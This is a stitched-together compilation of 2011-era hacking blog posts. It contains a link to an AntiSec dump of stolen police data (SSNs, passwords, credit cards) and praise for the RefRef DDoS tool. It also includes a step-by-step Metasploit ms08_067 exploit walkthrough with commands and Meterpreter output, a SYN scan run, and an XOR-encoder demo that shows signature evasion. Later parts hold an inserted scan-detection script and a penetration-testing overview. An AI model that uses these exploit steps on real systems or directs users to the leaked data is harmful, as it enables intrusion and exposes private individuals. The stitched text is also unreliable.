AntiSec hackers have once again leaked a huge 10GB data set at https://vv7pabmmyr2vnflf.tor2web.org/ , hacked from 70 law enforcement agencies. The leak contains hundreds of compromising email spools, personal information about officers, police training videos, and the contents of insecure anonymous tip systems. It also includes:
• Over 300 mail accounts from 56 law enforcement domains
• Missouri Sheriff account dump (mosheriffs.com): 7000+ usernames, passwords, home addresses, phones and SSNs
• Online Police Training Academy files: PDFs, videos, HTML
• Plesk plaintext server passwords (ftp/ssh, email, cpanel, protected dirs) and files
Stolen credit card information from the mosheriffs.com online store was also leaked on Pastebin.
“The Metasploit Framework is a penetration testing toolkit, exploit development platform, and research tool. The framework includes hundreds of working remote exploits for a variety of platforms. Payloads, encoders, and nop slide generators can be mixed and matched with exploit modules to solve almost any exploit-related task.”
Official Change LOG
Statistics:
Metasploit now ships with 716 exploit modules, 361 auxiliary modules, and 68 post modules.
20 new exploits, 3 new auxiliary modules, and 14 new post modules have been added since the last release (3.7.2)
New Modules since 3.7.2:
New Exploit Modules:
VSFTPD v2.3.4 Backdoor Command Execution
Java RMI Server Insecure Default Configuration Java Code Execution
HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow
Feature #4982 – Support for custom executable with psexec
Feature #4856 – RegLoadKey and RegUnLoadKey functions for the Meterpreter stdapi
Feature #4578 – Update Nmap XML parsers to support Nokogiri parsing
Feature #4417 – Post exploitation module to harvest OpenSSH credentials
Feature #4015 – Increase test coverage for railgun
Bug #4963 – Rework db_* commands for consistency
Bug #4892 – non-windows meterpreters upload into the wrong filename
Bug #4296 – Meterpreter stdapi registry functions create key if one doesn't exist
Bug #3565 – framework installer fails on RHEL (postgres taking too long to start)
Armitage: Armitage integrates with Metasploit 4.0 to:
Take advantage of the new Meterpreter payload stagers
Crack credentials with the click of a button
Run post modules against multiple hosts
Automatically log all post-exploitation activity
Revision Information:
Framework Revision 13462
Several import parsers were rewritten to use Nokogiri for much faster processing of large import files. Adding to Metasploit’s extensive payload support, Windows and Java Meterpreter now both support staging over HTTP and Windows can use HTTPS. In a similar vein, POSIX Meterpreter is seeing some new development again. It still isn’t perfect nor is it nearly as complete as the Windows version, but many features already work. Java applet signing is now done directly in Ruby, removing the need for a JDK for generating self-signed certificates. The Linux installers now ship with ruby headers, making it possible to install native gems in the Metasploit ruby environment.
Another flexibility improvement comes in the form of a consolidated pcap interface. The pcaprub extension ships with the Linux installers as of this release and support for Windows will come soon. Modules that used Racket for generating raw packets have been converted to Packetfu, which provides a smoother API for modules to capture and inject packets.
Previously you saw the source code of XerXes by The Jester. The Anonymous team has also developed its own DDoS tool, which is said to exploit SQL vulnerabilities to support the group's future campaigns. Previously they had been using LOIC for many of their operations, but many Anonymous members got caught because of that tool, as it was not capable of hiding their tracks. So this time they made their own.
According to the developer: "RefRef is a revolutionary DoS java site. Basically, by using an SQL and .js vulnerability, you can send a page request packet from your home computer with embedded .js file, because of the vulnerability in the SQL/Javascript engine on MOST websites, the site actually TEMPs the .js file on its own server. So now the .js is in place on the host of the site. Next since you still have the request, it picks up the .js file, and all of the requesting for packets power happens on the server, not the requestee. I send two packets from my iPhone, and everything else happens on the server. Basically eats itself apart, because since both are on the server, it's all a local connection."
This DDoS tool, #RefRef, is set to be released in September, according to an Anon promoting it on IRC this afternoon. Developed with JavaScript, the tool is said to use the target site's own processing power against itself. In the end, the server succumbs to resource exhaustion due to #RefRef's usage. An attack vector that has existed for some time, resource exhaustion is often skipped over by attackers who favor the brute force of a DDoS attack sourced from bots or tools such as LOIC.
The tool is very effective: a 17-second attack from a single machine resulted in a 42-minute outage on Pastebin yesterday. The Pastebin admins weren't happy and tweeted:
The effectiveness of RefRef is due to the fact that it exploits a vulnerability in a widespread SQL service. The flaw is apparently known but not widely patched yet. The tool's creators don't expect their attacks to work on a high-profile target more than a couple of times before being blocked, but they don't believe organizations will rush to patch this flaw en masse before being hit.
This means there are a lot of possible targets out there that will be hit at least once. "This tool only makes you vulnerable if you don't keep your systems patched, perform the basic security, which is how Sony got caught with its pants down," the RefRef developers said.
The tool works by turning the servers against themselves. It sends malformed SQL queries carrying the payload which in turn forces the servers to exhaust their own resources. However, the tool's GUI does have a field for inputting the refresh interval so it might combine traditional forms of HTTP hammering with the new technique. Some security experts have been skeptical that the success of Anonymous's DDoS attacks can be explained through LOIC alone. They proposed that some of the group's supporters also have access to botnets, a theory that has partially proven to be correct.
On the 4th of August, at the world's largest technical security conference, BlackHat USA 2011, taking place in Las Vegas, SAP security expert and ERPScan CTO Alexander Polyakov will show how any malicious attacker can gain access to systems running SAP over the Internet using a new critical vulnerability.
SAP systems are used in more than 100 000 companies worldwide to handle business-critical data and processes. In almost every Forbes 500 company the system is set up to handle processes ranging from purchasing, human resources and financial reporting to communication with other business systems. Thus an attacker who gains access obtains complete control over the company's financial flow, which can be used for espionage, sabotage and fraud against the hacked company.
The attack is possible due to a dangerous vulnerability of a new type, detected by Alexander in the J2EE engine of SAP NetWeaver, which allows authorization checks to be bypassed. For example, it is possible to create a user and assign him to the administrators group using two unauthorized requests to the system. It is also dangerous because the attack is possible on systems protected by two-factor authentication, where a secret key and a password are needed to gain access. To prove it, researchers from ERPScan created a program which detects SAP servers on the Internet with the help of a secret Google keyword and checks the servers found for the potentially dangerous vulnerability. As a result, more than half of the available servers could be hacked with the help of the vulnerability found.
“The danger is that it is not only a new vulnerability but a whole class of vulnerabilities that was theoretically described earlier but not popular in practice. During our research we only detected several examples in the standard system configuration, and because each company customizes the system for its own business processes, new examples of vulnerabilities of the given class can potentially be detected at each company in the future. We have developed a free program which can detect unique vulnerabilities of this type in order to protect companies in time, and it is also included in our professional product, ERPScan Security Scanner for SAP,” noted Alexander.
This may vary according to your Metasploit version.
The Basic Use of Metasploit
1. Pick which exploit to use
2. Configure the exploit with the remote IP address and remote port number
3. Pick a payload
4. Configure the payload with the local IP address and local port number
5. Execute the exploit
Now time for an example.
Type "show exploits" to see the list of exploits available. Many of the exploits listed here are going to work against the target servers, but the difficult part is knowing whether a given exploit will work or not =P
I will use:
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >
Now it is time to see the exploit commands; we type "help".
msf exploit(ms08_067_netapi) > help
Many commands appear, but I needed to check the exploit commands :( Yeah, got it, it is at the end :)
Exploit Commands
================
Command   Description
-------   -----------
check     Check to see if a target is vulnerable
exploit   Launch an exploit attempt
rcheck    Reloads the module and checks if the target is vulnerable
reload    Just reloads the module
rexploit  Reloads the module and launches an exploit attempt
Now it is time to see some information about the exploit.
Type "info" to see all this magic happen.
You will see a lot of information about the exploit, like name, version, available targets etc.
Above we were just looking at the information about the exploit, but now comes the original stunt.
We will set the payload that will run after the exploitation is successful.
To see the available payloads type "show payloads".
Now we will select a payload; I prefer windows/meterpreter/bind_tcp.
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
Type "show options" to see all the available options that we have to fill up.
We need to set RHOST (the victim). We type set RHOST xxx.xxx.xxx.xxx (the Xs being the IP address). Now when you type show options you will see RHOST filled with the IP address :)
The options vary from exploit to exploit; sometimes it may also ask for LHOST, which you have to fill with your local IP, i.e. your own computer's IP, in the same way: set LHOST xxx.xxx.xxx.xxx
The 'set' command allows you to configure Framework options and parameters for the current module you are working with.
After all the options are filled up, it is time to check the host before trying to exploit it.
We have a system, we have an exploit. Are we going to be able to compromise the system? Now is the time to find out. To perform the check type "check". This may not work on all exploits. It will see whether the server or target appears vulnerable. For some exploits you might have to provide information about what type of system to compromise; with the attack listed above this is not necessary.
Now if you are sure everything went right, type the command "exploit".
If successful you will see something like this (approximately):
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:English
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Triggering the vulnerability...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (xxx.xxx.xxx.xxx:51333 -> xxx.xxx.xxx.xxx:4444)
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set RHOST [TARGET IP]
msf exploit(ms08_067_netapi) > exploit
Now you own the PC; it is yours and you can do anything with it. I will not explain that here because it deserves another article.
The article is becoming longer. I have to make you understand auxiliary modules, NOPs and encoders in brief.
Auxiliary modules perform scanning, fuzzing, sniffing, information gathering and much more. These modules do not give you a shell, but they are equally as important as the exploits and payloads.
I will take Offensive Security's help here; I can't write so much, my hand is paining.
Auxiliary Example
Port Scanning
In addition to running Nmap, there are a variety of other port scanners that are available to us within the framework.
Name                        Description
----                        -----------
scanner/portscan/ack        TCP ACK Firewall Scanner
scanner/portscan/ftpbounce  FTP Bounce Port Scanner
scanner/portscan/syn        TCP SYN Port Scanner
scanner/portscan/tcp        TCP Port Scanner
scanner/portscan/xmas       TCP "XMas" Port Scanner
The Result
msf > use auxiliary/scanner/portscan/syn
msf auxiliary(syn) > show options
Module options (auxiliary/scanner/portscan/syn):
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
BATCHSIZE  256              yes       The number of hosts to scan per set
INTERFACE                   no        The name of the interface
PORTS      1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
RHOSTS                      yes       The target address range or CIDR identifier
SNAPLEN    65535            yes       The number of bytes to capture
THREADS    1                yes       The number of concurrent threads
TIMEOUT    500              yes       The reply read timeout in milliseconds
msf auxiliary(syn) > set INTERFACE eth0
INTERFACE => eth0
msf auxiliary(syn) > set PORTS 80
PORTS => 80
msf auxiliary(syn) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(syn) > set THREADS 50
THREADS => 50
msf auxiliary(syn) > run
[*] TCP OPEN 192.168.1.1:80
[*] TCP OPEN 192.168.1.2:80
[*] TCP OPEN 192.168.1.10:80
[*] TCP OPEN 192.168.1.109:80
[*] TCP OPEN 192.168.1.116:80
[*] TCP OPEN 192.168.1.150:80
[*] Auxiliary module execution completed
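Seen from the target side, the sweep above is one source sending SYNs to many hosts on a single port within a few seconds. As an added example (not from the original post and not Metasploit code), the following Ruby rule flags that pattern in constructed firewall log lines; the log format, the 60-second window and the five-host threshold are assumptions, and a slow probe is included to show that the window matters.

```ruby
require 'set'
require 'time'

# Constructed firewall log excerpt (iptables-like fields, not real data):
# 192.168.1.200 sweeps port 80 across the /24 in three seconds, the way the
# SYN scanner run above looks from the target side; 192.168.1.201 probes
# port 22 slowly; 192.168.1.50 is ordinary client traffic.
SAMPLE_LOG = <<~LOG
  2011-08-06T10:00:00Z SRC=192.168.1.50 DST=192.168.1.1 DPT=80 SYN
  2011-08-06T10:00:01Z SRC=192.168.1.200 DST=192.168.1.1 DPT=80 SYN
  2011-08-06T10:00:01Z SRC=192.168.1.200 DST=192.168.1.2 DPT=80 SYN
  2011-08-06T10:00:01Z SRC=192.168.1.200 DST=192.168.1.3 DPT=80 SYN
  2011-08-06T10:00:01Z SRC=192.168.1.200 DST=192.168.1.4 DPT=80 SYN
  2011-08-06T10:00:02Z SRC=192.168.1.200 DST=192.168.1.10 DPT=80 SYN
  2011-08-06T10:00:02Z SRC=192.168.1.200 DST=192.168.1.109 DPT=80 SYN
  2011-08-06T10:00:02Z SRC=192.168.1.200 DST=192.168.1.116 DPT=80 SYN
  2011-08-06T10:00:03Z SRC=192.168.1.200 DST=192.168.1.150 DPT=80 SYN
  2011-08-06T10:00:30Z SRC=192.168.1.50 DST=192.168.1.1 DPT=80 SYN
  2011-08-06T10:00:40Z SRC=192.168.1.50 DST=192.168.1.2 DPT=443 SYN
  2011-08-06T10:01:00Z SRC=192.168.1.201 DST=192.168.1.1 DPT=22 SYN
  2011-08-06T10:01:30Z SRC=192.168.1.201 DST=192.168.1.2 DPT=22 SYN
  2011-08-06T10:02:00Z SRC=192.168.1.201 DST=192.168.1.10 DPT=22 SYN
  2011-08-06T10:02:30Z SRC=192.168.1.201 DST=192.168.1.109 DPT=22 SYN
  2011-08-06T10:03:00Z SRC=192.168.1.201 DST=192.168.1.116 DPT=22 SYN
  this line is not a firewall record and is skipped
LOG

Event = Struct.new(:time, :src, :dst, :dport)
LINE_RE = /\A(?<ts>\S+) SRC=(?<src>[\d.]+) DST=(?<dst>[\d.]+) DPT=(?<dpt>\d+) SYN\z/

# Parses recognised lines into events; anything else is skipped, not fatal.
def parse_events(text)
  text.each_line.map do |line|
    m = LINE_RE.match(line.strip)
    m && Event.new(Time.iso8601(m[:ts]), m[:src], m[:dst], m[:dpt].to_i)
  end.compact
end

# Horizontal-sweep rule: one source touching at least +min_hosts+ distinct
# destinations on the same port within any +window+-second span. Returns
# { [src, dport] => distinct_host_count } for every pair that trips the rule.
def detect_sweeps(events, window: 60, min_hosts: 5)
  alerts = {}
  events.group_by { |e| [e.src, e.dport] }.each do |(src, dport), evs|
    sorted = evs.sort_by(&:time)
    sorted.each_with_index do |first, i|
      seen = Set.new
      sorted[i..-1].each do |e|
        break if e.time - first.time > window
        seen << e.dst
      end
      if seen.size >= min_hosts
        alerts[[src, dport]] = seen.size
        break
      end
    end
  end
  alerts
end

if __FILE__ == $PROGRAM_NAME
  detect_sweeps(parse_events(SAMPLE_LOG)).each do |(src, dport), n|
    puts "ALERT sweep from #{src}: #{n} hosts on port #{dport}"
  end
end
```

With the defaults only the fast sweep trips the rule; widening the window to 300 seconds also catches the slow port 22 probe, which is the usual tuning trade-off between missed slow scans and false positives from busy clients.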
The simplified NOP mixin provided in Msf::Simple::Nop extends each nop module instance with a method called generate_simple. This method takes the length of the sled to generate and the hash of options that should be used for the generation. On success, the return value is a buffer that is encoded using the Msf::Simple::Buffer class using the format specified in the option hash as the ’Format’ element. If no format is specified, the raw version of the NOP sled is returned.
Encoders
Encoder modules are used to generate transformed versions of raw payloads in a way that allows them to be restored to their original form at execution time and then subsequently executed. To accomplish this, most encoders will take the raw form of the payload and run it through some kind of encoding algorithm, like bitwise XOR. After the encoded version is generated, a decoding stub is prefixed to the encoded version of the payload. This stub is responsible for performing the inverse operation on the buffer attached to the decoder when it executes. After the decoder restores the payload to its original form, it will transfer execution to the start of the now normalized payload.
To support the above described encoder model, the Metasploit framework provides the Msf::Encoder class which inherits from the Msf::Module base class. All encoders must inherit from the Msf::Encoder class at some level to ensure that encoder-specific methods are included in the derived class. Like the module information hash, encoders have some specialized information hash elements that describe information about the encoder being used. The information that encoder modules need to describe are the attributes of the decoder, which is conveyed through the Decoder information hash element. The Decoder hash element references another hash that contains decoder specific properties. These are described in the table shown in figure 6.3 along with their types and module instance accessors.
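To make the "decoder stub + transformed payload" model concrete, here is an added toy implementation in Ruby (not Metasploit's own code and not a real encoder module). The stub is a constructed three-byte marker followed by the key and the length, standing in for the machine-code decoder; the transform is the XOR the text mentions, with the usual edge case handled that no transformed byte may be a NUL. The last function shows the consequence for detection: the same bytes encoded under two keys give two different bodies, so a signature on the raw payload no longer matches, while the constant stub still does.

```ruby
require 'securerandom'

# Constructed stand-in for a decoder stub. In a real encoder module this is
# machine code that performs the inverse transform; here it is a fixed marker
# followed by the one-byte key and the payload length.
STUB_MAGIC = "\xDE\xC0\xDE".b.freeze

# Forward and inverse transform are the same operation for XOR.
def xor_bytes(data, key)
  data.b.bytes.map { |b| b ^ key }.pack('C*')
end

# Picks a key such that no transformed byte lands in +bad_chars+ (the classic
# case is a NUL byte, which would cut a string copy short). Returns nil if
# no single-byte key works.
def choose_key(raw, bad_chars)
  bad = bad_chars.b.bytes
  (1..255).to_a.shuffle.find { |k| raw.b.bytes.none? { |b| bad.include?(b ^ k) } }
end

# Encoded blob = decoder stub || encoded body. +key+ is an explicit override
# (used for deterministic checks); otherwise a random acceptable key is chosen.
def encode_payload(raw, bad_chars: "\x00", key: nil)
  raw = raw.b
  key ||= choose_key(raw, bad_chars)
  raise 'no usable key for these bad characters' unless key
  STUB_MAGIC + [key, raw.bytesize].pack('Cn') + xor_bytes(raw, key)
end

# What the decoder stub does at run time: read key and length, restore body.
def decode_payload(blob)
  blob = blob.b
  raise 'decoder stub not found' unless blob.start_with?(STUB_MAGIC)
  key, len = blob.byteslice(STUB_MAGIC.bytesize, 3).unpack('Cn')
  xor_bytes(blob.byteslice(STUB_MAGIC.bytesize + 3, len), key)
end

# Plain substring signature check, as a content-inspection engine would do.
def signature_hits?(blob, signature)
  blob.b.include?(signature.b)
end

if __FILE__ == $PROGRAM_NAME
  raw = "\x90\x90\xCC\x41\x41".b   # constructed byte string, not real shellcode
  a = encode_payload(raw, key: 0x37)
  b = encode_payload(raw, key: 0x51)
  puts "same payload, two keys, different bodies: #{a != b}"
  puts "signature on raw bytes matches encoded blob: #{signature_hits?(a, raw)}"
  puts "signature on decoder stub matches: #{signature_hits?(a, STUB_MAGIC)}"
  puts "decoder restores original: #{decode_payload(a) == raw}"
end
```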
Explaining NOPs and encoders in depth will confuse newbies, so I will explain these later.
These are just the basic usages and this was written totally for beginners; more advanced information about Metasploit is waiting to be posted.
Replies, questions and suggestions regarding this topic are welcome.
This article is just to give you basic knowledge and make you understand the fundamentals of Penetration Testing.
Goal of this Article
• An overview of how Vulnerability Assessment (VA) & Penetration Testing (PT) is done
• Defining the scope of the assessment
• Types of Penetration Testing
• A brief understanding of how Buffer Overflow works
• How vulnerabilities are scanned and exploited
• What the end results are
• What a Penetration Testing Report should contain
Differentiating VA and PT
Vulnerability Assessment (VA)
In this case the security auditor has to only scan for the vulnerabilities in the server or application and filter out the false positives from the scan output by mapping them with the actual vulnerabilities associated with the target host.
VA Scope Includes:
• The VA test can be done both internally and externally
• No vulnerabilities are exploited
• No dangerous attacks like DOS and Buffer Overflow attacks are used
• Automated vulnerability scanning tools like Nessus, Retina or ISS are used
Penetration Testing (PT)
In this case the security auditor or the penetration tester not only has to scan for the vulnerabilities in the server or application but also has to exploit them to gain access to the remote server.
PT Scope Includes:
• The PT test is done both internally and externally
• Vulnerabilities are exploited
• Dangerous attacks like DOS and Buffer Overflow attacks are used depending upon the customer's willingness to do so
• Automated vulnerability scanning tools as well as exploits are used
Types Of Penetration Testing
Black Box Penetration Testing
• Pen tester has no previous knowledge of the remote network
• Simulating real-world hacking by a hacker who has no knowledge (e.g. operating system running, applications running, device type, network topology etc.) of the remote network environment
White Box Penetration Testing
• Pen tester has knowledge of the remote network:
• Type of network devices (i.e. Cisco gear, TCP/IP),
• WebServer details (i.e., Apache/*nix or Apache/Win2k),
• Operating System type (i.e., Windows/*nix),
• Database platform (i.e., Oracle or MS SQL),
• Load balancers (i.e. Alteon),
• Firewalls (i.e. Cisco PIX), etc.
• Simulating an attack by a hacker who has detailed knowledge of the remote network environment
Scope Of Penetration Testing
Non-Destructive Test
• Scans the remote hosts for possible vulnerabilities
• Analyze and confirm the findings
• Map the vulnerabilities with proper exploits
• Exploit the remote system with proper care to avoid disruption of service
• No highly critical Denial of Service (DoS) attack is tried
Destructive Test
• Scans the remote hosts for possible vulnerabilities
• Analyze and confirm the findings
• Map the vulnerabilities with proper exploits
• All highly critical Denial of Service (DoS) attacks (e.g. buffer overflows) are tried
~~~ Moving On To Penetration Testing ~~~
Penetration testing includes some steps ...
• Fingerprinting or Footprinting
• Network Information Gathering
• Surveying / Network Mapping
• Port Scanning and Services Identification
• Evading Firewall Rules
• Automated Vulnerability Scanning
• Exploiting Services for Known Vulnerabilities
• Exploiting Web-Based Authorization
• Password Cracking / Brute Forcing
• Denial of Service (DoS) Testing
• Escalation of Privileges
FLOW CHART
1. Information Gathering
This is the first step of any remote host penetration test. Here the pen-tester tries to gather as much information as possible on the remote host in order to make the attack more precise.
Expected Results:
• Zone Transfer Information
• Domain Registration Information
• Email IDs
• IP Address Range
Sample Screenshot (Server queried for Zone-Transfer Info):
(Information Gathered from Zone-Transfer Info)
2. Footprinting / Fingerprinting
In this step, information like the web server and OS type running on the remote host is gathered to further refine the attack.
3. Surveying / Network Mapping
A network survey often serves as an introduction to the systems to be tested. It is best defined as a combination of data collection, information gathering, and policy control.
Expected Results:
• Firewall / Routers / IDS Discovery
• Possible Local Network / Subnet Discovery
• IP Address Range
• Network Topology Mapping
• ISP information
Sample Screenshot (Local address of the remote network discovered):
4. Port Scanning & Services Identification
Port scanning is the invasive probing of system ports on the transport and network level. This module is to enumerate live or accessible Internet services as well as penetrating the firewall to find additional live systems.
Expected Results:
• Open, closed or filtered ports
• Services Identification
Sample Screenshot (NMAP port scan output):
5. Evading Firewall Rules
In this phase, firewall evasion techniques are used to bypass firewall rules. This can further help in port scanning, remote host detection and remote network discovery.
Expected Results:
• Mapping of firewall configuration rules
• Partial access to devices behind the firewall
Sample Screenshot (Trace Route using UDP packets):
It is clear from the two screenshots that the packet filtering device (i.e. Firewall / Router) is not configured to block UDP packets.
6. Automated Vulnerability Scanning
The focus of this module is identifying, understanding, and verifying the weaknesses, misconfigurations and vulnerabilities associated with the remote host. The scanning is done using automated tools or scripts to make the process faster.
Expected Results:
• List of vulnerabilities associated with each remote service
• List of possible denial of service vulnerabilities
• Possible misconfigurations on the remote server
Sample Screenshot
What is MVS ?
MVS is an automated Internet vulnerability scanner which scans for web-based vulnerabilities (e.g. CGI/IIS Unicode) associated with a remote host running a web server. The scanner output shows that the target host is vulnerable to IIS Unicode; the vulnerable string is highlighted in the screenshot below.
7. Exploiting Services For Known Vulnerabilities
This is the most important phase of penetration testing. Here the weaknesses found in the remote services are exploited using openly available exploits or self developed or customized exploits.
Here the web application flaws are exploited to gain access to restricted information. The Web-Based authentication is exploited by using XSS (Cross-Site Scripting) or SQL injection or MITM (Man-in-the-middle) attacks etc...
Expected Results:
• Access to restricted / confidential information
• Control over web configuration
• Can also lead to gaining access to other servers
Sample Screenshot (SQL injection used for gaining access to admin page):
8. Password Cracking or Brute Forcing
Password cracking is the process of validating password strength through the use of automated password recovery tools, which expose the use of weak passwords due to human factors.
Password lists and word lists are used for validating the passwords in this process.
9. Denial of Service (DoS) Testing
Denial of Service (DoS) is a situation where the applications or services running on the remote system stop functioning, preventing authenticated network users or devices from accessing them.
Expected Results:
• Disruption of services
• List of other possible DoS vulnerabilities associated with the systems
• Sabotage of the remote network
Sample Screenshot (DOS attack for CISCO):
10. Escalation of Privileges
Escalation of Privileges is the type of rights the attacker gains over the remote system. It is the final stage of the remote host hacking where the attacker gains complete control over the remote system.
Expected Results:
• Gain administrator / super user rights
• Gain privilege to retrieve or modify confidential data